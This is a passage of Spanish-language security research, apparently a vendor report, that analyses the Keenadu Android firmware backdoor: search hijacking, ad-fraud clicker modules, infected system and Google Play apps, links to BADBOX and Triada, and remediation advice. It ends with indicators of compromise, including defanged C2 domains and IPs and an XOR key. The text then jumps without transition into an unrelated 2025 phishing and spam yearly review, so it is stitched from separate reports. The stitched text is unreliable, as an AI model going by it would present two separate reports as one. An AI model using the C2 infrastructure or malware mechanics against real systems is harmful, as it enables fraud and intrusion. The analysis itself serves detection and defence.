Si se encuentra tal elemento, el malware rastrea los cambios de texto en él. Todas las consultas de búsqueda ingresadas por el usuario en url_bar se envían al servidor de los atacantes. Además, tras terminar de ingresar la consulta, el troyano también puede sustituir el motor de búsqueda del usuario dependiendo de la configuración obtenida del servidor del atacante.

Sustitución del motor de búsqueda

Vale la pena mencionar que la sustitución del buscador podría no funcionar si el usuario selecciona una solicitud desde las sugerencias, ya que en ese caso no se presiona la tecla Intro o el botón de búsqueda en la barra de direcciones (url_bar), que es el encargado de señalar al malware que se está iniciando una búsqueda. Sin embargo, los atacantes también estaban preparados para esto. El troyano intenta encontrar en la actividad actual el elemento omnibox_suggestions_dropdown, que representa un grupo de elementos gráficos (ViewGroup): sugerencias del motor de búsqueda. El troyano rastrea las pulsaciones en las sugerencias y sustituye el motor de búsqueda.

Sustitución del motor de búsqueda al pulsar en una de las variantes propuestas por el navegador

Clicker Nova (Phantom)

El módulo al inicio (MD5: f0184f6955479d631ea4b1ea0f38a35d) era un clicker que se integraba en el gestor de fondos de pantalla del sistema (com.android.wallpaper). En paralelo con nosotros, lo descubrieron investigadores de Dr.Web, quienes, sin embargo, no mencionaron en su informe el vector de distribución del clicker mediante el backdoor Keenadu. El módulo usa tecnologías de aprendizaje automático y WebRTC para interactuar con elementos publicitarios. Los colegas de Dr.Web lo llamaron Phantom, pero en la respuesta del servidor de comando y control se llama Nova. Además, la tarea ejecutada en el código también se llama NovaTask. Basándonos en esto, consideramos que el nombre original del clicker es Nova.

Nova: nombre del plugin

Señalemos también que algún tiempo después de la publicación del informe sobre este clicker, el servidor de comando y control de Keenadu comenzó a eliminarlo de los dispositivos infectados. Lo más probable es que los atacantes lo hayan hecho para evitar la detección.

Solicitud de descarga del módulo Nova

Asimismo, en la solicitud de descarga, el módulo Nova tenía un nombre algo diferente. Consideramos que bajo el nuevo nombre se oculta la última versión del módulo, que es un cargador y puede descargar los siguientes módulos:

• Clicker Nova.
• Módulo espía que carga información sobre el dispositivo de la víctima al servidor de los atacantes.
• Dropper Gegu SDK. Este módulo, según nuestros datos, es un dropper multinivel que ejecuta otros dos clickers.

Monetización de instalaciones

El módulo con hash MD5 3dae1f297098fa9d9d4ee0335f0aeed3 se integra en la aplicación del sistema para escritorio (com.android.launcher3). Al inicio de su trabajo, verifica el entorno en busca de artefactos de máquina virtual. Si no los encuentra, el malware registra un manejador de eventos de sesión de instalación de aplicaciones.

Registro del manejador

A la vez, el módulo solicita la configuración del servidor de comando y control. A continuación se presenta un ejemplo de tal configuración.

Ejemplo de configuración del módulo de monetización

Cuando en el dispositivo se inicia la instalación de una aplicación, el troyano envía información sobre esta aplicación al servidor de comando y control. En respuesta, el servidor de comando y control proporciona información sobre el anuncio publicitario que la promociona.

Información sobre la fuente publicitaria de la aplicación

Para cada sesión de instalación completada con éxito, el troyano ejecuta solicitudes GET en el enlace del campo tracking_link en la respuesta, así como en el primer enlace del array click. Los enlaces del array click, a juzgar por el código, son plantillas en las que se sustituyen varios identificadores publicitarios. Es posible que este sea un intento de monetizar las instalaciones de aplicaciones. Para esto, el troyano finge el tráfico desde el dispositivo de la víctima, convenciendo así a las plataformas publicitarias de que la aplicación fue instalada a partir de un anuncio.

Módulo para Google Play

Aunque AKClient finaliza la ejecución si se detecta a sí mismo en el proceso de Google Play, pudimos obtener la carga útil para este proceso desde el servidor C2. Este módulo (MD5: 529632abf8246dfe555153de6ae2a9df) recibe el identificador publicitario de Google Ads y lo guarda mediante la instancia global de la clase Settings con la clave S_GA_ID3. En adelante, otros módulos lo pueden usar como identificador de la víctima.

Obtención del identificador publicitario

Otros vectores de distribución de Keenadu

Durante la investigación decidimos buscar otras fuentes de infección de Keenadu. Como resultado, descubrimos que algunos módulos descritos arriba figuraban en ataques no relacionados con la infección de libandroid_runtime.so. Hablaremos de ellos con más detalle.

Aplicaciones del sistema

Según los datos de nuestra telemetría, el cargador de Keenadu se encontraba en diversas aplicaciones del sistema, en los firmwares de algunos dispositivos. Una de tales aplicaciones (MD5: d840a70f2610b78493c41b1a344b6893) resultó ser el servicio de reconocimiento facial con nombre de paquete com.aiworks.faceidservice. La aplicación contiene un conjunto de modelos de aprendizaje automático entrenados para reconocer rostros y permitir, en particular, la autenticación. Para esto, la aplicación define el servicio com.aiworks.lock.face.service.FaceLockService, que es usado por la interfaz del sistema (com.android.systemui) para desbloquear el dispositivo mediante reconocimiento facial.

Uso del servicio de reconocimiento facial en la interfaz del sistema

En el método onCreate del servicio com.aiworks.lock.face.service.FaceLockService, que será llamado al crear el servicio, se registran tres receptores que rastrean eventos de encendido y apagado de la pantalla, inicio de carga y disponibilidad de conexión de red. Cada uno de los receptores llama al método startMars, cuyo objetivo principal es inicializar el cargador malicioso mediante la llamada al método init de la clase com.hs.client.TEUtils.

Llamada maliciosa

El cargador es una versión muy parecida al de Keenadu. Esta versión usa la biblioteca nativa libhshelper.so para cargar módulos y para instalar APK. Para estos fines, la biblioteca define los métodos nativos correspondientes de la clase com.hs.helper.NativeMain.

Métodos nativos definidos por la biblioteca

Este vector de ataque (integración del cargador en aplicaciones del sistema) en sí mismo no es una novedad. Ya hemos descrito casos similares, por ejemplo, el cargador Dwphon, que se integraba en aplicaciones del sistema para actualizaciones OTA. Sin embargo, es la primera vez que nos encontramos con un troyano en un servicio de reconocimiento facial.

Además del servicio de reconocimiento facial, descubrimos otras aplicaciones del sistema infectadas con el cargador de Keenadu. Entre ellas está la aplicación de escritorio (launcher) en algunos dispositivos (MD5: 382764921919868d810a5cf0391ea193). En tales aplicaciones estaba integrado el servicio malicioso com.pri.appcenter.service.RemoteService, que inicia la ejecución del troyano.

También encontramos el cargador Keenadu en una aplicación cuyo paquete se llama com.tct.contentcenter (d07eb2db2621c425bda0f046b736e372). La app incluye el SDK publicitario fwtec, que obtiene su configuración mediante una solicitud HTTP GET a hxxps://trends.search-hub[.]cn/vuGs8 con follow-redirects desactivado. En respuesta, el troyano esperaba el código 302 (redirección) con URL en el encabezado Location, en cuyos parámetros se contenía la configuración del SDK. El parámetro hsby_search_switch actúa como switch de activación: cuando su valor es 1, el SDK fwtec inicia el cargador de Keenadu dentro del proceso de la aplicación.

Obtención de configuración del C2

Carga por otros backdoors

Al analizar nuestra telemetría, descubrimos una versión inusual del cargador de Keenadu (MD5: f53c6ee141df2083e0200a514ba19e32) en los directorios de diversas aplicaciones en el almacenamiento externo, ubicados en la ruta del tipo /storage/emulated/0/Android/data/%PACKAGE%/files/.dx/. A juzgar por el código, el cargador estaba diseñado para funcionar en un sistema con proceso system_server comprometido. Al mismo tiempo, los nombres de las interfaces binder que contenía diferían de las interfaces de AKServer. El cargador usaba las siguientes interfaces:

• com.androidextlib.sloth.api.IPServiceM
• com.androidextlib.sloth.api.IPermissionsM

Otro backdoor, con una estructura similar y también hallado en libandroid_runtime.so, usaba las mismas interfaces binder. El inicio de este backdoor en dispositivos infectados ocurre de la siguiente manera: libandroid_runtime.so importa la función maliciosa __android_log_check_loggable de la biblioteca liblog.so (MD5: 3d185f30b00270e7e30fc4e29a68237f). Esta función se llama en la implementación del método nativo println_native de la clase android.util.Log. Descifra mediante XOR de un byte la carga útil codificada en el cuerpo de la biblioteca y la ejecuta en el contexto de todas las aplicaciones en el dispositivo.

Descifrado de la carga útil

La carga útil tiene muchas similitudes con el backdoor BADBOX, una plataforma maliciosa compleja que fue descrita por primera vez por investigadores de HUMAN Security. En particular, coinciden las rutas en los servidores C2 a las que el troyano envía solicitudes HTTP. Por lo tanto, consideramos que esta es una de las versiones de BADBOX.

La ruta /terminal/client/register se encontraba en el informe de HUMAN Security

En este backdoor también descubrimos las interfaces binder que utilizaba el cargador Keenadu que mencionamos antes. Esto indica que las instancias correspondientes de Keenadu fueron instaladas por BADBOX.

Una de las interfaces binder usadas por Keenadu está definida en la carga útil

Modificaciones de aplicaciones populares

Por desgracia, que no se detecte Keenadu u otro backdoor preinstalado en el firmware de un dispositivo, no significa que el troyano no sea una amenaza. Así, el clicker Nova (Phantom) fue descubierto en paralelo con nosotros por los investigadores de Dr.Web. En su informe se describe otro vector de distribución: mediante modificaciones de programas populares que se entregan, en su gran mayoría, desde orígenes no oficiales, así como diversas aplicaciones en la tienda GetApps.

Google Play

Las aplicaciones infectadas penetraron también en Google Play. Durante la investigación identificamos apps de cámaras IP troyanizadas que se distribuían en la tienda oficial Google Play. El volumen combinado de descargas superaba las 300 000.

Aplicaciones infectadas en Google Play

Todas incluían el servicio com.arcsoft.closeli.service.KucopdInitService, responsable de inicializar el clicker Nova. Alertamos a Google sobre la presencia de aplicaciones infectadas en la tienda y los desarrolladores las eliminaron. El servicio malicioso estaba presente en todas las apps, pero su activación dependía del nombre del paquete: solo se ejecutaba cuando este coincidía con com.taismart.global.

El servicio malicioso se iniciaba solo bajo ciertas condiciones

Los Cuatro Fantásticos: los vínculos que existen entre Triada, BADBOX, Vo1d y Keenadu

Al descubrir que BADBOX descarga uno de los módulos de Keenadu, decidimos realizar una investigación adicional para averiguar si no hay más señales de conexión entre estos troyanos. Como resultado, descubrimos que BADBOX y Keenadu tienen similitudes en el código de la carga útil que descifra y ejecuta el código malicioso en libandroid_runtime.so. También descubrimos similitudes entre el cargador de Keenadu y el módulo BB2DOOR del troyano BADBOX. Considerando que en el código hay diferencias evidentes, así como el hecho de que BADBOX descargaba el cargador de Keenadu, suponemos que son botnets diferentes, y los desarrolladores de Keenadu quizá se hayan inspirado en el código de BADBOX. Además, los autores de Keenadu dirigen sus esfuerzos ante todo a las tabletas Android.

En nuestro último informe sobre el backdoor Triada mencionamos que el servidor de comando y control de uno de los módulos descargados por él se ubicaba en el mismo dominio que uno de los servidores de comando y control de la botnet Vo1d, lo que puede indicar la conexión entre estos dos troyanos. Sin embargo, durante la investigación, logramos descubrir una conexión entre Triada y la botnet BADBOX. En los directorios donde BADBOX descargaba el cargador de Keenadu también se encontraban otras cargas útiles para diversas aplicaciones. Su descripción merece un informe aparte, y para resumir no entraremos en detalles en este artículo, limitándonos al análisis de la carga útil para clientes de Telegram e Instagram (MD5: 8900f5737e92a69712481d7a809fcfaa). El punto de entrada de esta carga útil es la clase com.extlib.apps.InsTGEnter. Está destinada al robo de credenciales de las cuentas de las víctimas en los servicios infectados. Es interesante que en ella también hay código para el robo de credenciales del cliente de WhatsApp, que, sin embargo, no se usa de ninguna manera.

Código de la carga útil de BADBOX usado para robar credenciales de clientes de WhatsApp

Las direcciones de los servidores C2 a los que el troyano exfiltra datos se almacenan cifradas en el código del malware. Para descifrarlas, primero se decodifica el string en base64 y luego se aplica XOR con la clave xiwljfowkgs.

Direcciones descifradas de los servidores de comando y control de la carga útil

Tras descifrar las direcciones C2, identificamos el dominio zcnewy[.]com, que se asociaba con campañas de Triada. Encontramos ese dominio en 2022 en modificaciones maliciosas de WhatsApp que contenían Triada. En ese momento suponíamos que el fragmento de código destinado al robo de credenciales del cliente de WhatsApp y el dropper malicioso pertenecían a Triada. Tomando en cuenta que hemos mostrado que el dominio zcnewy[.]com está relacionado con BADBOX, consideramos que en 2022 las modificaciones infectadas de WhatsApp que describimos contenían dos troyanos diferentes: Triada y BADBOX. Para confirmar esta hipótesis, volvimos a estudiar una de estas modificaciones (caa640824b0e216fab86402b14447953) y descubrimos que en ella estaba integrado el código del dropper de Triada y del módulo de BADBOX, similar en funcionalidad al descrito arriba. Los troyanos, aunque se iniciaban desde un mismo punto de entrada, no interactuaban entre sí de ninguna manera y su estructura era muy diferente. Esto nos hace pensar que en 2022 observamos un ataque conjunto de BADBOX y Triada.

Inicio de BADBOX y Triada desde un mismo punto de entrada

Por lo tanto, podemos concluir que varias de las mayores botnets de Android interactúan entre sí. Por el momento, logramos confirmar la conexión de Triada con Vo1d y BADBOX, así como la conexión de Keenadu con BADBOX. Los investigadores de HUMAN Security también señalaron la conexión entre Vo1d y BADBOX. Vale decir que las conexiones descritas no son transitivas. Por ejemplo, de la conexión de Triada y Keenadu con BADBOX no se deduce que Triada y Keenadu estén conectados entre sí; esta última afirmación requiere una prueba aparte. Sin embargo, no nos sorprendería si dentro de poco aparecieran informes que permitan demostrar que esta conexión sí existe.

Las víctimas

Según los datos de nuestra telemetría, 13 715 usuarios en todo el mundo se toparon con Keenadu o sus módulos. Nuestras soluciones de seguridad registraron el mayor número de usuarios atacados por malware en Rusia, Japón, Alemania, Brasil y los Países Bajos.

Nuestras recomendaciones

Nuestro servicio de soporte técnico recibe con frecuencia preguntas sobre las acciones a realizar si la solución de seguridad detecta Keenadu en el dispositivo. En esta sección veremos todos los escenarios posibles de lucha contra el troyano.

Si la biblioteca libandroid_runtime.so está infectada

En las versiones modernas de Android, la partición del sistema, en la que entre otras cosas se encuentra libandroid_runtime.so, está montada en modo “solo lectura”. Incluso si se admite la posibilidad teórica de modificar esta partición, la biblioteca infectada libandroid_runtime.so no se podrá eliminar sin dañar el firmware: el dispositivo dejará de arrancar. Por lo tanto, no será posible eliminar la amenaza con medios estándar del SO Android. El uso de un dispositivo infectado con el backdoor Keenadu puede acarrear múltiples inconvenientes. Por ejemplo, en las reseñas de dispositivos infectados, los compradores se quejan de publicidad molesta, así como de la aparición de diversos sonidos cuya fuente no logran establecer.

Reseña de tabletas infectadas

Si su dispositivo está infectado con el backdoor Keenadu, recomendamos:

1. Verificar la disponibilidad de actualizaciones de software. Es posible que para el dispositivo ya haya salido un firmware limpio. Después de la actualización, es necesario verificar con ayuda de una solución de protección confiable que el problema se haya solucionado.
2. Si no existe una actualización de firmware limpia del fabricante para tu dispositivo, puede instalar un firmware limpio de forma independiente. Es importante recordar que instalar firmware de forma manual puede dejar el dispositivo inoperante.
3. Hasta el reemplazo o actualización del firmware, recomendamos abstenerse de usar el dispositivo infectado.

Si una de las aplicaciones del sistema está infectada

Por desgracia, como en el caso anterior, no será posible eliminar tal aplicación del dispositivo, ya que se encuentra en la partición del sistema. Si encontró el cargador de Keenadu en una aplicación del sistema, le recomendamos:

1. De ser posible, encontrar un reemplazo para la aplicación. Por ejemplo, si la aplicación de escritorio está infectada, se puede descargar cualquier análogo que no contenga software malicioso. Si no existen alternativas para la aplicación (por ejemplo, el servicio de reconocimiento facial está infectado), recomendamos en la medida de lo posible no usar la función correspondiente.
2. Deshabilitar la aplicación infectada mediante ADB si se encontró un análogo para ella o se puede renunciar a su funcionalidad. Esto se puede hacer con el comando adb shell pm disable --user 0 %PACKAGE%.

Si en el dispositivo se instaló una aplicación infectada

Este es uno de los casos más simples de infección. Si la solución de protección descubrió en su dispositivo una aplicación infectada con Keenadu, basta con eliminar la aplicación siguiendo las indicaciones de la solución de protección.

Conclusión

Los desarrolladores de backdoors preinstalados en firmwares de dispositivos Android siempre se han distinguido por su alta calificación. En el caso de Keenadu, también es así: los autores del malware comprenden bien la estructura de Android y el proceso de inicio de aplicaciones, así como los principios básicos de seguridad del sistema operativo. Durante la investigación nos sorprendió el alcance de las campañas de Keenadu: además del backdoor principal en los firmwares, sus módulos se encontraban en aplicaciones del sistema e incluso en aplicaciones de Google Play. Esto coloca al troyano en la misma escala que otros malware como Triada o BADBOX. La aparición de un nuevo backdoor preinstalado de tal escala significa que esta categoría de malware es un mercado aparte donde existe una gran competencia.

Keenadu es una plataforma maliciosa amplia y compleja que proporciona a los atacantes un control ilimitado sobre el dispositivo de la víctima. Aunque por el momento logramos mostrar que el backdoor se usa para diversos tipos de fraude publicitario, no descartamos que en el futuro el malware pueda seguir, por ejemplo, el camino de Triada y comenzar a robar credenciales.

Indicadores de compromiso

Los clientes del servicio Threat Intelligence disponen de indicadores adicionales de compromiso, detalles técnicos y una regla YARA para detectar la actividad de Keenadu. Para más información, escríbanos a [email protected].

Bibliotecas maliciosas libandroid_runtime.so
bccd56a6b6c9496ff1acd40628edd25e
c4c0e65a5c56038034555ec4a09d3a37
cb9f86c02f756fb9afdb2fe1ad0184ee
f59ad0c8e47228b603efc0ff790d4a0c
f9b740dd08df6c66009b27c618f1e086
02c4c7209b82bbed19b962fb61ad2de3
185220652fbbc266d4fdf3e668c26e59
36db58957342024f9bc1cdecf2f163d6
4964743c742bb899527017b8d06d4eaa
58f282540ab1bd5ccfb632ef0d273654
59aee75ece46962c4eb09de78edaa3fa
8d493346cb84fbbfdb5187ae046ab8d3
9d16a10031cddd222d26fcb5aa88a009
a191b683a9307276f0fc68a2a9253da1
65f290dd99f9113592fba90ea10cb9b3
68990fbc668b3d2cfbefed874bb24711
6d93fb8897bf94b62a56aca31961756a

Cargas útiles de Keenadu
2922df6713f865c9cba3de1fe56849d7
3dae1f297098fa9d9d4ee0335f0aeed3
462a23bc22d06e5662d379b9011d89ff
4c4ca7a2a25dbe15a4a39c11cfef2fb2
5048406d8d0affa80c18f8b1d6d76e21
529632abf8246dfe555153de6ae2a9df
7ceccea499cfd3f9f9981104fc05bcbd
912bc4f756f18049b241934f62bfb06c
98ff5a3b5f2cdf2e8f58f96d70db2875
aa5bf06f0cc5a8a3400e90570fb081b0
ad60f46e724d88af6bcacb8c269ac3c1
dc3d454a7edb683bec75a6a1e28a4877
f0184f6955479d631ea4b1ea0f38a35d

Aplicaciones del sistema infectadas con el descargador Keenadu
07546413bdcb0e28eadead4e2b0db59d
0c1f61eeebc4176d533b4fc0a36b9d61
10d8e8765adb1cbe485cb7d7f4df21e4
11eaf02f41b9c93e9b3189aa39059419
19df24591b3d76ad3d0a6f548e608a43
1bfb3edb394d7c018e06ed31c7eea937
1c52e14095f23132719145cf24a2f9dc
21846f602bcabccb00de35d994f153c9
2419583128d7c75e9f0627614c2aa73f
28e6936302f2d290c2fec63ca647f8a6
382764921919868d810a5cf0391ea193
45bf58973111e00e378ee9b7b43b7d2d
56036c2490e63a3e55df4558f7ecf893
64947d3a929e1bb860bf748a15dba57c
69225f41dcae6ddb78a6aa6a3caa82e1
6df8284a4acee337078a6a62a8b65210
6f6e14b4449c0518258beb5a40ad7203
7882796fdae0043153aa75576e5d0b35
7c3e70937da7721dd1243638b467cff1
9ddd621daab4c4bc811b7c1990d7e9ea
a0f775dd99108cb3b76953e25f5cdae4
b841debc5307afc8a4592ea60d64de14
c57de69b401eb58c0aad786531c02c28
ca59e49878bcf2c72b99d15c98323bcd
d07eb2db2621c425bda0f046b736e372
d4be9b2b73e565b1181118cb7f44a102
d9aecc9d4bf1d4b39aa551f3a1bcc6b7
e9bed47953986f90e814ed5ed25b010c

Aplicaciones infectadas con el clicker Nova
0bc94bc4bc4d69705e4f08aaf0e976b3
1276480838340dcbc699d1f32f30a5e9
15fb99660dbd52d66f074eaa4cf1366d
2dca15e9e83bca37817f46b24b00d197
350313656502388947c7cbcd08dc5a95
3e36ffda0a946009cb9059b69c6a6f0d
5b0726d66422f76d8ba4fbb9765c68f6
68b64bf1dea3eb314ce273923b8df510
9195454da9e2cb22a3d58dbbf7982be8
a4a6ff86413b3b2a893627c4cff34399
b163fa76bde53cd80d727d88b7b1d94f
ba0a349f177ffb3e398f8c780d911580
bba23f4b66a0e07f837f2832a8cd3bd4
d6ebc5526e957866c02c938fc01349ee
ec7ab99beb846eec4ecee232ac0b3246
ef119626a3b07f46386e65de312cf151
fcaeadbee39fddc907a3ae0315d86178

CDN para entregar cargas útiles
ubkt1x.oss-us-west-1.aliyuncs[.]com
m-file-us.oss-us-west-1.aliyuncs[.]com
pkg-czu.istaticfiles[.]com
pkgu.istaticfiles[.]com
app-download.cn-wlcb.ufileos[.]com

Servidores C2
110.34.191[.]81
110.34.191[.]82
67.198.232[.]4
67.198.232[.]187
fbsimg[.]com
tmgstatic[.]com
gbugreport[.]com
aifacecloud[.]com
goaimb[.]com
proczone[.]com
gvvt1[.]com
dllpgd[.]click
fbgraph[.]com
newsroomlabss[.]com
sliidee[.]com
keepgo123[.]com
gsonx[.]com
gmsstatic[.]com
ytimg2[.]com
glogstatic[.]com
gstatic2[.]com
uscelluliar[.]com
playstations[.]click

Cifras del año

• A nivel mundial, el spam representó el 47,27% del tráfico de correo electrónico en 2025, mientras que en el segmento ruso alcanzó el 48,57%.
• Rusia concentró el 32,50% del volumen mundial de spam emitido durante el año.
• Nuestro antivirus de correo bloqueó 125 521 794 archivos adjuntos maliciosos en correos electrónicos
• El sistema Antiphishing bloqueó 554 002 207 intentos de acceso a enlaces de phishing

Phishing y estafas en 2025

Ataques phishing y estafas en el sector de entretenimiento

En 2025, uno de los temas más populares de los sitios de phishing en el sector de entretenimiento fueron los cines en línea, que ofrecían disfrutar de un estreno importante antes de su lanzamiento oficial. También fueron muy frecuentes las páginas de phishing que imitaban plataformas para la venta y entrega de boletos para eventos de entretenimiento. Los atacantes ofrecían a los usuarios boletos gratis para conciertos de artistas populares en una página con un diseño casi idéntico al sitio de una conocida boletería digital. Para participar en la “promoción” de los estafadores, la víctima debía pagar una pequeña comisión o los gastos de envío de los boletos a una dirección. Por supuesto, el usuario pagaba, pero no recibía ningún boleto.

Además de los señuelos en forma de conciertos, los estafadores también fueron ganando interés por otros temas vinculados con la música. A los visitantes de una página de phishing se les ofrecía votar por su artista favorito, una actividad común en comunidades de fans. Para dar más credibilidad a la estafa, se mencionaban marcas grandes como Google y Spotify. Este esquema de phishing apuntaba a cuentas de varias plataformas a la vez: para iniciar sesión, se debían ingresar las credenciales de Facebook, Instagram o del correo electrónico.

Los atacantes usaron como señuelo la promesa de migrar la lista de reproducción del usuario desde Spotify hacia YouTube para obtener sus credenciales. Para hacerlo, la víctima solo debía ingresar las credenciales de Spotify.

Los atacantes usaron la popularidad de Spotify no solo para phishing, sino también para ataques de scam. En Brasil, los estafadores ofrecían a los usuarios escuchar canciones, calificarlas y recibir dinero por ello.

Para retirar los supuestos fondos, la víctima debía ingresar su número de identificación del sistema brasileño de pagos instantáneos PIX.

Después, se pedía al usuario confirmar su identidad. Para ello, la víctima debía realizar un pago único de una pequeña suma, muy por debajo de las ganancias potenciales.

El formulario para enviar el “pago de verificación” tenía un aspecto muy verosímil: incluso solicitaba datos personales adicionales. quizá para usarlos en ataques posteriores.

En otro caso, a los usuarios se les ofrecía participar en una encuesta a cambio de un vale de regalo por valor de 1 000 dólares. Sin embargo, como es común en este tipo de estafas, la víctima debía pagar una comisión modesta o los gastos de correo para obtener el certificado. Tras recibir el dinero, los atacantes desaparecían y el sitio quedaba inaccesible.

Una agradable salida con una chica de un sitio de citas también podía terminar en pérdida financiera. El modus operandi de los estafadores se desarrollaba así: tras un breve díalogo, la supuesta “chica” proponía una cita presencial. Para ello, la interlocutora elegía un entretenimiento de costo moderado, como un cine o un teatro poco popular, e incluso enviaba un enlace a una página donde, según decía, se podían comprar boletos para el evento indicado.

Para dar más credibilidad, se le pedía al comprador la ciudad de residencia.

Pero tras pagar los boletos, desaparecían tanto la página como la interlocutora de la supuesta cita.

Con el mismo esquema operaban estafas donde se vendían boletos para juegos de escape. El diseño de las páginas era muy similar al de los sitios reales, lo que podía bajar la guardia de los visitantes.

Los phishers explotan la prisa del usuario por adquirir paquetes vacacionales de último minuto, momento en el que suele descuidar la verificación de la URL para cerciorarse de que es legítima. Por ejemplo, en la página falsa que se muestra a continuación, una supuesta gran agencia turística japonesa ofrecía tours exclusivos por Japón.

Datos confidenciales bajo amenaza: phishing contra servicios gubernamentales

Para recopilar datos personales de usuarios de Internet, los atacantes usaron un esquema clásico de phishing: formularios falsos para tramitar documentos en portales que se hacían pasar por gubernamentales. Estas páginas reproducían con fidelidad tanto el diseño como los servicios ofrecidos en los portales gubernamentales legítimos. Así, en Brasil, los atacantes recopilaban datos de personas físicas con el pretexto de emitir un certificado de registro de inmuebles rurales (CCIR).

De este modo, los estafadores obtenían acceso a información confidencial de la víctima, incluido el número de identificación fiscal individual (CPF). El CPF funciona como identificador único del ciudadano brasileño en portales gubernamentales, bases de datos nacionales y documentos personales, lo que multiplica los riesgos si cae en manos de atacantes. El acceso de los estafadores a estos datos conlleva el riesgo de robo de identidad, acceso a plataformas gubernamentales y riesgos financieros.

Además, los usuarios podían perder dinero: en algunos casos, los atacantes pedían una “comisión” por tramitar un documento importante.

Los estafadores también intentaban obtener el número de identificación fiscal individual por otros medios. Así, detectamos páginas de phishing que imitaban el portal oficial de servicios gubernamentales; para iniciar sesión se usa el número CPF.

Otro tema que explotaron los estafadores fueron los pagos gubernamentales. En 2025, los ciudadanos de Singapur recibieron del gobierno vales por el sexagésimo aniversario del país por un monto de 600 a 800 dólares. Para usarlos, los usuarios debían autorizarse en el sitio del programa. Las páginas falsas intentaban imitar ese sitio. Es curioso que, en este caso, los objetivos fueron cuentas de Telegram, aunque en el portal legítimo no se requerían.

Detectamos un fraude dirigido a usuarios de Noruega que desean renovar su licencia de conducir. Al abrir el recurso, que imitaba el sitio oficial de la autoridad de transporte de Noruega, el visitante debía indicar el número del vehículo y un teléfono de contacto.

Luego se pedían datos sensibles, como el identificador personal único de cada ciudadano de Noruega. Así, los atacantes no solo obtenían acceso a información confidencial, sino que también creaban la impresión de que la víctima estaba en un sitio web oficial.

Tras ingresar los datos personales, se abría una página falsa de pago de una tasa de 1 200 coronas, que pasaban sin devolución a los estafadores si la víctima introducía los datos de su tarjeta.

En Alemania, con el pretexto de presentar la declaración de impuestos, en páginas de phishing se solicitaban el usuario y la contraseña del correo electrónico.

El llamado a realizar acciones urgentes es un recurso clásico en escenarios de phishing. Junto con la amenaza de perder bienes, estos esquemas se vuelven un señuelo para posibles víctimas y desvían su atención del URL incorrecto o de la maquetación deficiente del sitio. Por ejemplo, una advertencia sobre un impuesto vehicular impago se volvió una herramienta para atacantes que buscaban robar credenciales del portal gubernamental del Reino Unido.

Observamos que desde la primavera de 2025 se hicieron más frecuentes los envíos de correos que se hacían pasar por comunicaciones automáticas del portal ruso de servicios gubernamentales. Estos mensajes se distribuían como notificaciones sobre la actualización del estado de una solicitud y contenían enlaces de phishing.

También registramos ataques de phishing dirigidos a usuarios de portales gubernamentales. En ellos, se le ofrecía a la víctima verificar la seguridad de su cuenta llamando al número indicado en el correo para contactar al la asistencia técnica. Para bajar la guardia de los usuarios, los atacantes añadían detalles técnicos falsos, como una dirección IP y la marca del dispositivo desde el que, según el mensaje, se había iniciado sesión, así como la hora del acceso.

El año pasado, los atacantes también disfrazaron correos de phishing como notificaciones de MFO o BKI sobre solicitudes de préstamo. Si el destinatario no había solicitado el crédito (en eso se basaba el cálculo de los estafadores), se le proponía contactar a una asistencia técnica falsa mediante un número telefónico falso.

Conozca a su cliente

Como medida adicional de protección de datos, muchos servicios usan verificaciones con biometría (imagen facial, huellas dactilares, autenticación por retina), además de documentos de identidad y firmas. Para obtener estos datos de los usuarios, los estafadores copian páginas de servicios populares donde se aplican estas verificaciones. En entregas anteriores analizamos en profundidad el robo de estos datos biométricos.

En 2025, observamos un aumento en el número de ataques de phishing contra usuarios con el pretexto de verificaciones KYC (Conozca a su cliente). KYC usa un conjunto de datos del usuario para la identificación. Al falsificar las páginas de servicios de pago Vivid Money, los estafadores recopilaban la información necesaria para pasar la autenticación KYC.

Por cierto, los usuarios de otros servicios que utilizan KYC también enfrentaron esta amenaza.

Una característica de los ataques a procedimientos KYC es que, además del nombre completo, el correo electrónico y el número de teléfono, los phishers solicitan fotos del pasaporte o del rostro de la víctima, a veces desde varios ángulos. Si esta información llega a manos de los atacantes, además de la pérdida de acceso a la cuenta o al panel personal, las credenciales de la víctima pueden venderse en mercados clandestinos, como ya lo hemos mencionado.

Phishing y mensajeros

El robo de cuentas en los mensajeros WhatsApp y Telegram es uno de los objetivos más comunes de ataques de phishing y scam. Los estratagemas clásicos (por ejemplo, ofertas sospechosas para abrir un enlace desde un mensaje) son conocidos desde hace mucho, pero los recursos para robar credenciales continúan diversificándose.

Así, a usuarios de Telegram se les ofrecía participar en un sorteo de premios auspiciado por un deportista famoso. El ataque de phishing, disfrazado como entrega de regalos NFT, se realizaba mediante una miniaplicación dentro de Telegram, mientras que antes los atacantes creaban páginas web para estos fines.

En 2025, en el conocido esquema de distribución de enlaces de phishing en Telegram empezaron a aparecer nuevos libretos. Por ejemplo, vimos propuestas para elegir al mejor odontólogo o al líder operativo en la ciudad.

La temática más popular en los fraudes de votación, los concursos infantiles, se difundía a través de WhatsApp. A la vez, las páginas de phishing casi no variaban: los atacantes usaban el mismo diseño y fotos señuelo, y solo cambiaban el idioma del recurso según la ubicación del público objetivo.

Para participar en la votación, la víctima debía ingresar el número de teléfono vinculado a la cuenta de WhatsApp.

Después se le solicitaba un código de un solo uso para la autenticación en el mensajero.

Pero veamos otros métodos comunes que usan los estafadores para robar credenciales.

En China circulaban páginas de phishing que clonaban por completo la interfaz de WhatsApp. Los atacantes notificaban a la víctima que su cuenta había sido vinculada a actividades ilegales, y que debía pasar una “verificación adicional”.

A continuación, remitían a la víctima a una página para ingresar el teléfono y le pedían el código de autorización.

En otros casos, los usuarios recibían un mensaje enviado en nombre del soporte de WhatsApp, donde se informaba que habría una verificación de autenticidad de cuentas mediante SMS. Al igual que en otros casos descritos, el objetivo de los atacantes era obtener el código para completar la autenticación.

Los estafadores proponían a usuarios de WhatsApp instalar una aplicación falsa para sincronizar comunicaciones con contactos comerciales.

Para hacer más realista el recurso de phishing, los atacantes proponían inventar credenciales para esa página.

Luego el usuario debía “contratar una suscripción” para usar la aplicación; así los estafadores obtenían los datos de tarjetas bancarias, y la víctima se quedaba sin el servicio prometido.

Como señuelo para usuarios de Telegram, los phishers enviaban invitaciones a chats de citas en línea.

Los ciberdelincuentes también usaron mucho el señuelo de una suscripción gratuita a Telegram Premium. Si el año pasado veíamos estas páginas de phishing solo en ruso e inglés, ahora el alcance de zonas lingüísticas se amplió. Como antes, para activar la suscripción la víctima debía iniciar sesión en su cuenta, lo que podía causar pérdida de acceso.

Manipulación del tema de ChatGPT

Los atacantes utilizan cada vez más el tema de la inteligencia artificial como señuelo. Por ejemplo, vimos recursos que imitaban la página oficial de pago de la suscripción a ChatGPT Plus.

